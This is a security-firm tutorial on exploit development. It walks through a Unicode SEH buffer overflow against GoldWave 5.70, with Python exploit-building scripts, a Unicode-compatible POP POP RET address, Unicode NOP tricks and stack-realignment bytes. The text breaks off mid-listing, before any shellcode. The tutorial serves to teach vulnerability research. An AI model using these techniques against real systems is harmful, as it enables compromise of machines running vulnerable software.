Cybersecurity

The Basics of Exploit Development 4: Unicode Overflows

Coalfire Cybersecurity Team

July 10, 2020
This content is provided "as is" and is more than a year old. No representations are made that the content is up-to date or error-free.

Introduction

If you have read the previous articles in this series, welcome back and keep reading. If not, I would encourage you to read those first before proceeding, as this article builds on concepts laid down in the previous installments. In this article, we will be covering a technique similar to the one in the second installment of this series but with the twist of the character encoding of the input being in Unicode. In order to demonstrate how to get around this impediment, we will be writing parts of the payload and doing some stack realignment manually.

Setup

This guide was written to run on a fresh install of Windows 10 Pro (either 32-bit or 64-bit should be fine), so you should follow along inside a Windows 10 virtual machine. The vulnerability has also been tested on Windows 7; however, the offsets in this article come from the Windows 10 machine and may differ on a Windows 7 installation. The steps to recreate the exploit are exactly the same.

You will need a copy of X64dbg which can be downloaded from the official website and you will also need a copy of the ERC plugin for X64dbg from here. If you already have a copy of X64dbg and the ERC plugin installed, connecting to any process and running “ERC --Update” will download and install the latest 32-bit and 64-bit plugins, after which you can restart the debugger. As the vulnerable application we will be working with is a 32-bit application, it will be necessary to either download the 32-bit version of the plugin binaries or to compile the plugin manually. Instructions for installing the plugin can be found on the Coalfire GitHub page.

If you’re using Windows 7 and X64dbg crashes and exits on startup with the plugin installed, you may need to install .NET Framework 4.7.2, which can be downloaded here.

Finally, you will need a copy of the vulnerable application (Goldwave 5.70), which can be found here. To confirm everything is working, start X64dbg and select File -> Open, then navigate to where you installed Goldwave570.exe and select the executable. Click through the breakpoints and the Goldwave GUI should pop up. Now in X64dbg’s terminal type:

Command:
ERC --help

You should see the following output:
X64dbg open, running the ERC plugin and attached to Goldwave570.exe

Let’s get started!

What is Unicode?

Unicode is a character encoding scheme. There are lots of languages with lots of characters that computers should ideally display. Unicode assigns each character a unique number, or code point.

Originally, when 8-bit computers were the apex of our capability, ASCII was created to cover the dominant language in computing at the time, which was English. ASCII mapped characters to numbers, originally using 7 bits (128 values, 0 through 127), with later 8-bit extensions covering characters from other languages. With 26 letters in both upper and lower case, plus digits and punctuation, this worked quite well for a time.

However, over time the need arose to represent characters from all languages, and this simply could not be done with the 256 values available in 8 bits. Thus, more character encodings were needed.

Unicode provides a solution to this problem by separating a character's code point from the bytes used to store it. There are multiple UTF (Unicode Transformation Format) encodings, each built on a unit size: 8 bits for UTF-8, 16 bits for UTF-16 (UTF-16 is what Windows defines as “Unicode”), and 32 bits for UTF-32. UTF-8 and UTF-16 are variable width: certain bit patterns in a unit mark it as part of a multi-unit sequence, and otherwise the unit represents one character fully. UTF-32 is fixed width and always uses one unit per code point. Thus the most common (English) characters occupy only one byte in UTF-8 (two in UTF-16, four in UTF-32), while other characters can occupy up to four bytes in UTF-8 or UTF-16.
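The difference between the three encodings is easy to check with Python's built-in codecs. This is only an illustrative sketch; the helper name `encoded_sizes` and the sample characters are chosen here for the example and do not come from the exploit itself.

```python
def encoded_sizes(ch: str) -> dict:
    """Return how many bytes one character occupies in each UTF encoding."""
    return {enc: len(ch.encode(enc)) for enc in ("utf-8", "utf-16-le", "utf-32-le")}

# A plain ASCII letter, an accented letter, the euro sign, and an emoji.
for ch in ["A", "\u00e9", "\u20ac", "\U0001F600"]:
    print(f"U+{ord(ch):04X}", encoded_sizes(ch))
```

The ASCII letter is the case that matters for this article: one byte in UTF-8 but two in UTF-16, the second of which is a null byte.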

Now that Unicode has been defined as a multibyte character encoding, you need to know what to look for in the debugger. When an input string of “AAAA…” is used, it will no longer be shown as “41414141…” because, as mentioned above, Windows predominantly uses UTF-16 as its Unicode standard, meaning even basic English characters are two bytes long.

ASCII:
A   -> 41
ABC -> 414243

Unicode:
A   -> 0041
ABC -> 004100420043

Obviously, these additional null bytes will cause a problem, since any address we wish to overwrite EIP or our SEH registers with will need to contain null bytes. However, we do have some tools to help with those hurdles. More on those later.
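The byte layout can be reproduced in Python. This is a minimal sketch that assumes the application widens its input the same way Python's UTF-16 little-endian codec does, which matches what is observed for plain ASCII input; the helper name `widen` is hypothetical. Note that the bytes sit in memory in little-endian order, so the code unit `0041` is stored as `41 00`.

```python
import struct

def widen(text: str) -> bytes:
    """Encode text as UTF-16LE, the in-memory form Windows calls Unicode."""
    return text.encode("utf-16-le")

wide = widen("ABC")
print(wide.hex(" "))          # 41 00 42 00 43 00

# Four bytes of widened "AA" read back as a little-endian 32-bit value,
# which is how an overwritten pointer would be interpreted.
(pointer,) = struct.unpack("<I", widen("AA"))
print(hex(pointer))           # 0x410041
```

Every pointer written this way has null bytes in its second and fourth positions, which is the constraint the rest of the exploit has to work around.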

Confirming the Vulnerability Exists

This exploit begins with an SEH overwrite similar to the one covered in the second installment of this series. As such we will need to crash the program and confirm that the input we provided overwrites an SEH handler.

To begin, use the following python code to generate the input:

f = open("crash-1.txt", "wb")

buf = b""
buf += b"\x41" * 5000   # 5000 "A" characters

f.write(buf)
f.close()


Run this to create crash-1.txt, then copy the contents of the file to the clipboard. Open Goldwave, select File, then “Open URL”, and paste the contents after http://. The application should crash, and you should then be able to see what the Unicode input string looks like in memory.

Unicode string in memory

As seen in the image above, the input is read into memory with a null byte after every character. In the disassembly, one 0x41 byte is left as is while the next one absorbs the two null bytes around it. This is because a null byte is the opcode of an add byte ptr instruction, which consumes the bytes that follow it as operands, whereas 0x41 (inc ecx) takes no operands. As such, changing the values we put in the string changes how the bytes are interpreted as instructions in memory. Navigating to the SEH tab, you should see that the first handler has been overwritten with 00410041.

SEH handler overwritten with Unicode As

Now that we have confirmed the vulnerability exists, it is time to begin developing a full exploit.

Developing the Exploit

At this point we know the application is vulnerable to an SEH overflow. We should first set up our environment so that all our output files are generated in an easily accessible place.

Command:
ERC --Config SetWorkingDirectory <C:\Wherever\you\are\working\from>

Setting the Working Directory

Now we should set an author so we know who is building the exploit.

Command:
ERC --Config SetAuthor <You>

Setting the Author

Now we must identify how far into our buffer the SEH overwrite occurs. For this we will execute the following command in order to generate a pattern using ERC:

Command:
ERC --pattern c 5000

Output of ERC --Pattern c 700

We can now add this into our exploit code either directly from the debugger or from the Pattern_Create_1.txt file in our working directory to give us exploit code that looks something like the following.

f = open("crash-2.txt", "wb")

buf = b""
buf += b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac"
buf += b"9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8"
buf += b"Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7A"
buf += b"i8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al"
buf += b"7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6"
buf += b"Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5A"
buf += b"r6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au"
buf += b"5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4"
buf += b"Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3B"
buf += b"a4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd"
buf += b"3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2"
buf += b"Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1B"
buf += b"j2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm"
buf += b"1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0"
buf += b"Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9B"
buf += b"s0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu"
buf += b"9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8"
buf += b"Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7C"
buf += b"a8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd"
buf += b"7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6"
buf += b"Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5C"
buf += b"j6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm"
buf += b"5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4"
buf += b"Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3C"
buf += b"s4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv"
buf += b"3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2"
buf += b"Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1D"
buf += b"b2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De"
buf += b"1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0"
buf += b"Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9D"
buf += b"k0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm"
buf += b"9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8"
buf += b"Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7D"
buf += b"s8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv"
buf += b"7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6"
buf += b"Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5E"
buf += b"b6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee"
buf += b"5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4"
buf += b"Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3E"
buf += b"k4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En"
buf += b"3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2"
buf += b"Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1E"
buf += b"t2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew"
buf += b"1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0"
buf += b"Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9F"
buf += b"c0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe"
buf += b"9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8"
buf += b"Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7F"
buf += b"k8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn"
buf += b"7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6"
buf += b"Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5F"
buf += b"t6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw"
buf += b"5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4"
buf += b"Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3G"
buf += b"c4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf"
buf += b"3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2"
buf += b"Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk"

f.write(buf)
f.close()

With this, if we now generate the crash-2.txt file and copy its contents into our vulnerable application, we will encounter a crash. We can now run the FindNRP command in order to identify how far through our buffer the SEH record was overwritten. Appended to the FindNRP command is the -Unicode switch. This switch specifies that the character encoding is UTF-16 (the Windows Unicode default). It only needs to be specified once per debugging session. As such, all further commands will be in Unicode (where applicable) until the debugger is restarted.

Command:
ERC --FindNRP -Unicode

Output of ERC --FindNRP -Unicode
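For intuition, the kind of lookup FindNRP performs can be approximated in a few lines of Python. This is a sketch of the general cyclic-pattern technique, not ERC's actual implementation; the function names are hypothetical, and it assumes the pattern follows the upper/lower/digit ordering visible in the listing above and that the bytes found in memory are the UTF-16LE-widened pattern characters.

```python
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits

def cyclic_pattern(length: int) -> str:
    """Build the Aa0Aa1Aa2... pattern, truncated to the requested length."""
    triples = ("".join(t) for t in product(ascii_uppercase, ascii_lowercase, digits))
    return "".join(triples)[:length]

def find_offset(memory: bytes, pattern: str) -> int:
    """Locate widened pattern bytes (for example nSEH + SEH, 8 bytes) in the pattern."""
    needle = memory.decode("utf-16-le")   # strip the interleaved null bytes
    return pattern.find(needle)           # -1 when the bytes are not pattern data

pattern = cyclic_pattern(5000)

# Simulate the 8 bytes that would cover an SEH record sitting 1019 characters in.
record = pattern[1019:1023].encode("utf-16-le")
print(find_offset(record, pattern))
```

Four pattern characters are used for the lookup because a two-character window is not unique within the pattern.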

The output of the FindNRP command above displays that the SEH register is overwritten after 1019 characters in the malicious payload. As such, we will now ensure that our tool output is correct by overwriting our SEH register with Bs and Cs. First, we will need to hit the restart button in order to restart the process and prepare it for another malicious payload. The following exploit code should produce an overwrite of Bs and Cs over the SEH register:  

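f = open("crash-3.txt", "wb")

buf = b""
buf += b"\x41" * 1019               # padding up to the SEH record
buf += b"\x42" * 2                  # Bs: first half of the SEH record
buf += b"\x43" * 2                  # Cs: second half of the SEH record
buf += b"\x44" * (5000 - len(buf))  # filler up to 5000 characters

f.write(buf)
f.close()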


SEH Overwrite

As you can see, the SEH register is overwritten with Bs and Cs as expected. Now, to return to our exploit code, we will need to find a POP, POP, RET instruction sequence. For a full rundown of how an SEH overflow works, read the previous article in this series. In order to find a suitable pointer to a POP, POP, RET instruction set, we will run the following command. As the character encoding is set to Unicode, only Unicode-compatible results will be returned.

Command:
ERC --SEH -ASLR -SafeSEH -Rebase -OSDLL -NXCompat

Output of the ERC --SEH Command

As you can see, there are a number of options to choose from for POP, POP, RET instructions. Normally when carrying out an SEH overflow, we would execute a POP, POP, RET instruction set and then use a short jump to hop over the handler address. However, this is not possible with Unicode due to the additional null bytes we must deal with. Instead, execution has to run straight through the bytes of the POP, POP, RET address itself, so those bytes must decode to instructions that do not crash the program.

Because of that, we decided to go with 004800b3, whose bytes decode to instructions we can walk through without crashing the application. At this point, our exploit code should look something like this:

f = open("crash-4.txt", "wb")

buf = b""
buf += b"\x41" * 1021               # Added 2 bytes to cover nSEH. We will replace these later with Unicode NOPs
buf += b"\xB3\x48"                  # 0x004800b3 | pop ecx, pop ebp, ret
buf += b"\x44" * (5000 - len(buf))

f.write(buf)
f.close()
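To see why only two bytes are written for a four-byte pointer, the widening can be modelled directly. The helper names below are hypothetical, and the sketch assumes each input byte is zero-extended to a 16-bit little-endian unit, as observed for this input field (on other systems, bytes above 0x7F may be translated differently depending on the active code page).

```python
import struct

def is_unicode_compatible(address: int) -> bool:
    """True when the address has the form 0x00XX00YY."""
    return address & 0xFF00FF00 == 0

def address_to_input(address: int) -> bytes:
    """Return the two input bytes that widen into the given address."""
    if not is_unicode_compatible(address):
        raise ValueError(f"{address:#010x} cannot be produced by widened input")
    raw = struct.pack("<I", address)   # little-endian: YY 00 XX 00
    return raw[0::2]                   # drop the null bytes the widening adds

def widen_bytes(data: bytes) -> bytes:
    """Zero-extend every byte to a 16-bit little-endian unit."""
    return b"".join(bytes([b, 0]) for b in data)

seh = address_to_input(0x004800B3)
print(seh.hex())                       # b348
print(widen_bytes(seh).hex())          # b3004800
```

The same check explains why the list of usable POP, POP, RET pointers is so much shorter in Unicode mode: only addresses with null bytes in the right positions qualify.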


We should now test our code and confirm that the POP, POP, RET does work and that we land where we expect to. To do this, place a breakpoint at the address of our POP, POP, RET instruction set:

Landing at POP, POP, RET

That test confirms that we land at our POP, POP, RET instruction set. It returns us to our SEH overwrite, which we can step through to land in our payload. Normally this would be mission complete. However, Unicode payloads are slightly more complex than a normal payload and some additional steps are required.

Aligning the Stack and Positioning our Payload

Under normal circumstances, a payload generated by MSFVenom or a similar tool will have a getPC (Program Counter) routine. However, there is no standard routine for Unicode Overflows. We can manually emulate this code by aligning one of our CPU registers to the address where our shell code begins.

To achieve this, we’ll have to create a Unicode NOP, since 0x90 on its own will not work: the null bytes inserted around it decode into instructions that crash the application. We need an instruction that, combined with a null byte or two, will not crash the application. For that purpose, use 0x71 and 0x75.

0x75 - Combined with a null byte before and after (00 75 00), this produces an “add byte ptr [EBP], dh” instruction. This does not cause a crash because our registers indicate that EBP points into the address space of our application.

0x71 - Combined with a single trailing null byte (71 00), this produces a “JNO” (jump if not overflow) instruction with an offset of zero. Whether or not the overflow flag (OF) is set, execution continues at the next instruction, so it behaves as a NOP throughout this exploit.
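How these bytes pair up with the inserted nulls can be illustrated with a toy decoder. This is a hand-rolled sketch that understands only the handful of opcodes used in this article (it is not a real disassembler, and the function name is hypothetical); for JNO it prints the relative displacement rather than a target address.

```python
REG8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"]
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
ONE_BYTE = {0x40: "inc", 0x48: "dec", 0x50: "push", 0x58: "pop"}

def toy_disassemble(code: bytes) -> list[str]:
    """Decode the few x86 opcodes used in this article; anything else is 'db'."""
    out, i = [], 0
    while i < len(code):
        op = code[i]
        # 00 /r with mod=01 and no SIB byte: add byte ptr [reg32+disp8], reg8
        if (op == 0x00 and i + 2 < len(code)
                and (code[i + 1] >> 6) == 1 and (code[i + 1] & 7) != 4):
            modrm = code[i + 1]
            disp = int.from_bytes(code[i + 2:i + 3], "little", signed=True)
            out.append(f"add byte ptr [{REG32[modrm & 7]}{disp:+#x}], "
                       f"{REG8[(modrm >> 3) & 7]}")
            i += 3
        elif (op & 0xF8) in ONE_BYTE:          # single-byte inc/dec/push/pop
            out.append(f"{ONE_BYTE[op & 0xF8]} {REG32[op & 7]}")
            i += 1
        elif op == 0x71 and i + 1 < len(code): # jno rel8
            rel = int.from_bytes(code[i + 1:i + 2], "little", signed=True)
            out.append(f"jno {rel:+#x}")
            i += 2
        else:
            out.append(f"db {op:#04x}")
            i += 1
    return out

print(toy_disassemble(bytes.fromhex("41004100")))  # widened "AA"
print(toy_disassemble(bytes.fromhex("007500")))    # 0x75 between two nulls
print(toy_disassemble(bytes.fromhex("7100")))      # 0x71 with trailing null
```

The first call reproduces the alternating inc/add pattern seen after the initial crash, and the other two show the two Unicode NOPs in isolation.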

Now we will need to place these values between the instructions that we want to execute. We will use 0x75 between specific instructions and 0x71 as a NOP sled. After that, all we need to do is align a register to the start of our payload to finish our exploit.

Note: A Unicode NOP sled does not technically need a separate instruction. It could simply be achieved using a combination of 0x75 and 0x90. However, we have added in 0x71 to demonstrate a second way of generating a Unicode NOP.

To align the register, we will push the value of ESP onto the stack and then pop that value into EAX. We then add to and subtract from EAX in order to get the value exactly where we want it.

The final stack alignment instructions should look something like the following:

# realigning stack
buf += b"\x75"          # Unicode NOP
buf += b"\x54"          # PUSH ESP
buf += b"\x75"          # Unicode NOP
buf += b"\x58"          # POP EAX
buf += b"\x75"          # Unicode NOP
buf += b"\x05\xFF\x10"  # ADD EAX, 0x1000FF00
buf += b"\x75"          # Unicode NOP
buf += b"\x2d\xEA\x10"  # SUB EAX, 0x1000EA00
buf += b"\x75"          # Unicode NOP


When read into memory, this will grab our unwanted null bytes and attach them all to the appropriate 0x75 bytes so they do not get in the way of what we are trying to do.

Stack alignment instructions in memory

As we can see, our 0x004800B3 pointer has converted into harmless instructions and our Unicode NOPs have absorbed the unwanted null bytes. We then add 0x1000FF00 to EAX and subtract 0x1000EA00 from it in order to leave EAX with the value of 0x0019E664 or 1190 bytes past the current location of EIP.
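The immediates in the ADD and SUB instructions can be checked with a short calculation. This is a sketch under the same assumption as before, namely that every input byte is followed by a null byte in memory; `widen_bytes` is a hypothetical helper.

```python
def widen_bytes(data: bytes) -> bytes:
    """Zero-extend every byte to a 16-bit little-endian unit."""
    return b"".join(bytes([b, 0]) for b in data)

add_eax = widen_bytes(b"\x05\xFF\x10")   # 05 00 ff 00 10 00
sub_eax = widen_bytes(b"\x2d\xEA\x10")   # 2d 00 ea 00 10 00

# Opcodes 0x05 (ADD EAX, imm32) and 0x2D (SUB EAX, imm32) are each followed
# by a 32-bit little-endian immediate. The sixth byte is left over and is
# absorbed by the 0x75 Unicode NOP that follows.
add_imm = int.from_bytes(add_eax[1:5], "little")
sub_imm = int.from_bytes(sub_eax[1:5], "little")

print(hex(add_imm), hex(sub_imm))        # 0x1000ff00 0x1000ea00
print(hex(add_imm - sub_imm))            # 0x1500
```

The two large values are needed because each immediate must have null bytes in its first and third positions; only their difference, 0x1500, actually moves EAX relative to the saved ESP value.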

This is where our second Unicode NOP comes into play. We will now fill the space between EIP and the address of our final payload with the second NOP (0x71). Remember, a null byte is added after each character we inject, so we only need half as many characters as there are bytes between EIP and EAX.
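As a quick worked example of that halving, using the 1190-byte gap reported above (the variable names are illustrative only):

```python
GAP_BYTES = 1190            # distance from EIP to EAX reported in the article
BYTES_PER_INPUT_CHAR = 2    # each injected character is followed by a null byte

sled_chars, remainder = divmod(GAP_BYTES, BYTES_PER_INPUT_CHAR)
sled = b"\x71" * sled_chars

print(sled_chars, remainder)   # 595 0
```

An odd gap would leave a remainder of one byte, in which case the alignment arithmetic on EAX would need adjusting rather than the sled length.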

f = open("crash-5.txt", "wb")

buf = b""
buf += b"\x41" * 1019
buf += b"\x71\x71"       # Unicode NOP
buf += b"\xB3\x48"       # 0x004800b3 | pop ecx, pop ebp, ret

# realigning stack
buf += b"\x75"           # Unicode NOP
buf += b"\x54"           # PUSH ESP
buf += b"\x75"           # Unicode NOP
buf += b"\x58"           # POP EAX
buf += b"\x75"           # Unicode NOP
